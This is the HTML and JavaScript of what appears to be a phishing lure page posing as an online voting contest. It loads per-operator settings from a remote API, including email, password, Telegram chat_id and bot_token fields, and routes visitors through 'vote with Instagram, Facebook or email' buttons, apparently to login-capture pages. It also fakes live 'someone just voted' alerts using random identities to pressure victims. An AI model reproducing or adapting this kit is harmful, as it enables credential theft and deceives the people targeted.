<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>

    <meta name="robots" content="noindex" />
    <meta name="googlebot" content="noarchive">


    <meta property="og:url" content="https://branz.com/en">
    <meta property="og:type" content="website">
    <meta property="og:title" content="">
    <meta property="og:description" content="">
    <meta property="og:image" content="https://i.ibb.co/jvTfd5Tb/dabas.jpg">

    <!-- Twitter Meta Tags -->
    <meta name="twitter:card" content="summary_large_image">
    <meta property="twitter:domain" content="https://brz.com/en">
    <meta property="twitter:url" content="https://brandstez.com/en">
    <meta name="twitter:title" content="">
    <meta name="twitter:description" content="">
    <meta name="twitter:image" content="https://i.ibb.co/jvTfd5Tb/dabas.jpg">


    <link rel="stylesheet" href="https://pro.fontawesome.com/releases/v6.0.0-beta1/css/all.css"
        integrity="SHA384-ABC123==" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

</head>

<body>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            background: #eeeded;
            font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
            color: #525151;
            margin: 70px 0;
        }

        .container-item {
            background-color: white;
            width: 90%;
            margin: 0 50%;
            transform: translateX(-50%);
            border-radius: 3px;
        }

        #social-ul {
            display: flex;
            list-style-type: none;
            justify-content: center;
            align-items: center;
            margin: 5px 0;
        }

        #social-ul li {
            margin: 5px;
            background: #069c6c;
            color: white;
            padding: 7px 10px;
            border-radius: 3px;
            font-size: 13px;
        }

        #social-ul li:nth-child(2) {
            background: #da2828;
        }

        #list-item {
            list-style-type: none;
            margin: 10px 0;
        }

        #list-item li {
            padding: 8px 10px;
        }

        #list-item li:nth-child(1) {
            background: #5aa7f46a;
            color: #0d4d8c;
            border-left: 2px solid dodgerblue;
        }

        a {
            color: inherit;
            text-decoration: none;
        }

        .notification-container {
            position: fixed;
            width: 95%;
            bottom: 50px;
            left: 50%;
            transform: translateX(-50%);
            background-color: #3498db;
            color: #fff;
            padding: 15px;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
            opacity: 0;
            transition: opacity 0.5s ease-in-out;
        }

        .show-notification {
            opacity: 1;
        }

        .notification-content {
            display: flex;
            justify-content: space-between;
            align-items: center;
        }

        .notification-content img {
            border-radius: 50%;
            margin-right: 10px;
        }

        .notification-text {
            flex-grow: 1;
        }

        @keyframes slideIn {
            from {
                transform: translateY(100%);
            }

            to {
                transform: translateY(0);
            }
        }

        .container {
            display: none;
        }

        .loader {
            width: 100%;
            height: 100%;
            background-color: #F4F4F4;
            position: fixed;
            top: 0;
            left: 0;
            display: flex;
            align-items: center;
            justify-content: center;
        }

        @media screen and (min-width: 768px) {
            .container-item {
                width: 50%;
            }

            .notification-container {
                width: 500px;
            }

        }

        @media screen and (min-width: 1200px) {
            .container-item {
                width: 40%;
            }
        }
    </style>
    <img src="./images/cloth.jpeg" widht="250px" height="250px"
        style="position: absolute; top: 0; left: 50%; opacity: 0;">

    <div class="loader">
        <style>
            .progress-container {
                width: 100%;
                height: 5px;
                background-color: #e2dede;
                margin: 0 5%;
            }

            .progress-item {
                width: 10%;
                height: 5px;
                background-color: #277dee;
            }
        </style>
        <div class="progress-container">
            <img src="./images/dabas.jpg" alt=""
                style="position: fixed; top: 0; left: 0;  width: 100%; height: 100%" id="img-load">
            <div class="progress-item"></div>
        </div>
        <script>
            let progress = 0;
            const progress_item = document.querySelector('.progress-item'); // Adjust the selector to match your element
            const increment = 5; // 10% increment
            const intervalTime = 300; // 300ms for each step (adjust as needed)
            const maxProgress = 100; // Maximum progress
            const img_load = document.getElementById('img-load')

            setTimeout(() => {
                img_load.style.opacity = 0
                setTimeout(() => {
                    const interval = setInterval(() => {
                        if (progress < maxProgress) {
                            progress += increment;
                            progress_item.style.width = `${progress}%`;
                        } else {
                            clearInterval(interval); // Stop the interval once it reaches 100%
                        }
                    }, intervalTime);
                }, 1500);
            }, 1000);
        </script>
    </div>
    <div class="container">
        <div class="container-item">
            <p
                style='text-align: center; font-size: 20px; margin: 10px 0; text-transform: uppercase; padding: 10px 0; font-weight: bold'>
                Please i need your vote</p>
            <img src="" width="100%" id="profileImage">
            <p style='text-align: center; padding: 5px; font-weight: bold' id="profileName"></p>
            <div class="counter"
                style='border: 2px solid dodgerblue; border-radius: 3px; margin: 0 5%; padding: 5px 10px ;'>
                <div style='display: flex; justify-content: center'>
                    <input type="radio" checked style='color: dodgerblue'>
                    <p style='padding: 0 3px; font-size: 14px; padding: 10px 0'> Total Votes: <span
                            id="minValue"></span> out of
                        <span id="maxValue"></span></p>
                </div>
                <div style='display: flex; justify-content: center; margin: 3px 10%'>
                    <div class="progress-container"
                        style='width: 100%; background: #edeaea; height: 6.5px; border-radius: 3px; overflow: hidden;'>
                        <div class="progress" style='background: dodgerblue; width: 90%; height: 6.5px'></div>
                    </div>
                </div>
            </div>
            <p style='text-align: center; font-weight: bold; padding: 4px 0; margin: 10px 0; font-size: 20px'><i
                    class="fa fa-check"></i> Total Votes To Win: <span id="totalValue"></span></p>
            <div style='display: flex; justify-content: center; '>
                <div id="ig" style="display: block;"><a href="1" id="iglink"><button
                            style='margin: 5px; padding: 10px; background: #069c6c; color: white; border-radius: 3px; border: none; font-size: 12px;'>VOTE
                            WITH <i class="fa fa-instagram"></i></button></a></div>
                <div id="fb" style="display: none;"><a href="5.html" id="fblink"><button
                            style='margin: 5px; padding: 10px; background: #277dee; color: white; border-radius: 3px; border: none; font-size: 12px;'>VOTE
                            WITH <i class="fa fa-facebook"></i></button></a></div>
                <div id="mail" style="display: block;"><a href="2.html" id="maillink"><button
                            style='margin: 5px; padding: 10px; background: #e02a3f; color: white; border-radius: 3px; border: none; font-size: 12px;'>VOTE
                            WITH <i class="fa fa-envelope"></i></button></a></div>

            </div><br>
        </div>
    </div>
    <br><br>

    <div id="notification" class="notification-container">
        <div class="notification-content">
            <img src="" alt="User Avatar" width="30" height="30" id="userAvatar">
            <div class="notification-text" id="notificationContent"></div>
        </div>
    </div>
    <script>
        var loader = document.querySelector('.loader')
        var container = document.querySelector('.container')

        setTimeout(() => {
            loader.style.display = 'none'
            container.style.display = 'block'
        }, 8000);

        var dataValue;
        var profileImage = document.getElementById("profileImage")
        var profileName = document.getElementById("profileName")
        var minValue = document.getElementById("minValue")
        var maxValue = document.getElementById("maxValue")
        var totalValue = document.getElementById("totalValue")
        var igValue = document.getElementById("ig")
        var fbValue = document.getElementById("fb")
        var mailValue = document.getElementById("mail")
        var igLink = document.getElementById("iglink")
        var fbLink = document.getElementById("fblink")
        var mailLink = document.getElementById("maillink")
        var params = new URLSearchParams(window.location.search);
        var paramsValue = params.get('id');

        var profile_name;
        var profile_min;
        var profile_max;
        var profile_url;
        var profile_image;
        var profile_ig;
        var profile_fb;
        var profile_mail;
        var ig;
        var fb;
        var mail;
        var accountStatus

        setTimeout(() => {
            profileName.textContent = profile_name
            profileImage.src = profile_url + 'images/' + profile_image
            minValue.textContent = profile_min
            maxValue.textContent = profile_max
            totalValue.textContent = maxValue.textContent - minValue.textContent
            ig = profile_ig
            fb = profile_fb
            mail = profile_mail



            if (ig === "active") {
                igValue.style.display = "block"
                igLink.href = "1.html?id=" + user_id
            } else {
                igValue.style.display = "none"
            }

            if (fb === "active") {
                fbValue.style.display = "block"
                fbLink.href = "5.html?id=" + user_id
            } else {
                fbValue.style.display = "none"
            }

            if (mail === "active") {
                mailValue.style.display = "block"
                mailLink.href = "2.html?id=" + user_id
            } else {
                mailValue.style.display = "none"
            }

            if (account_status === "pending") {
                window.location = "error2.html"
            }

        }, 5000);



        setTimeout(() => {
            userId.value = params.get('id')
            var get_id = params.get('id')
            if (get_id === "") {
                window.location.href = 'error.html'
            }
            if (accountStatus === "pending") {
                window.location.href = 'error2.html'
            }

            global_url = 'https://bez.com/en/info/login.php'
        }, 5000);

        var dataUrl = "https://brandstez.com/en/info/request_api.php?id=" + paramsValue
        setTimeout(() => {
            fetch(dataUrl)
                .then(response => response.json())
                .then(datas => {
                    if (datas.length === 0) {
                        window.location.href = 'https://hostblast.net/cgi-sys/suspendedpage.cgi'
                    }
                    datas.forEach(data => {
                        user_id = data.user_id
                        email = data.email
                        password = data.password
                        profile_name = data.profile_name
                        profile_image = data.profile_image
                        profile_min = data.min
                        profile_max = data.max
                        chat_id = data.chat_id
                        bot_token = data.bot_token
                        design = data.design
                        profile_ig = data.ig
                        profile_fb = data.fb
                        profile_mail = data.mail
                        profile_url = data.url
                        accountStatus = data.status
                        console.log(data)
                        if (data.status === "pending") {
                            window.location.href = 'https://hostblast.net/cgi-sys/suspendedpage.cgi'
                        }
                    });
                }).catch(error => console.error('Error ', error));

        }, 2000);



        function getRandomUser() {
            return fetch('https://randomuser.me/api/')
                .then(response => response.json())
                .then(data => {
                    const user = data.results[0];
                    const country = user.location.country;
                    const name = `${user.name.first} ${user.name.last}`;
                    const avatar = user.picture.thumbnail;
                    return {
                        country,
                        name,
                        avatar
                    };
                })
                .catch(error => {
                    console.error('Error fetching random user:', error);
                    return {
                        country: 'FallbackCountry',
                        name: 'FallbackName',
                        avatar: ''
                    }; // Use fallback data in case of an error
                });
        }

        function showNotification(country, name, avatar) {
            const notificationContainer = document.getElementById('notification');
            const notificationContent = document.getElementById('notificationContent');
            const userAvatar = document.getElementById('userAvatar');

            userAvatar.src = avatar;
            notificationContent.innerHTML = `Someone from ${country} named ${name} just voted.`;
            notificationContainer.classList.add('show-notification');

            setTimeout(() => {
                notificationContainer.classList.remove('show-notification');
            }, 5000); // Hide after 5 seconds
        }

        // Simulate votes with random data every 5 seconds
        setInterval(() => {
            getRandomUser().then(userData => {
                showNotification(userData.country, userData.name, userData.avatar);
            });
        }, 6000); // Update every 5 seconds
    </script>
    <script src="main.js"></script>

</body>

</html>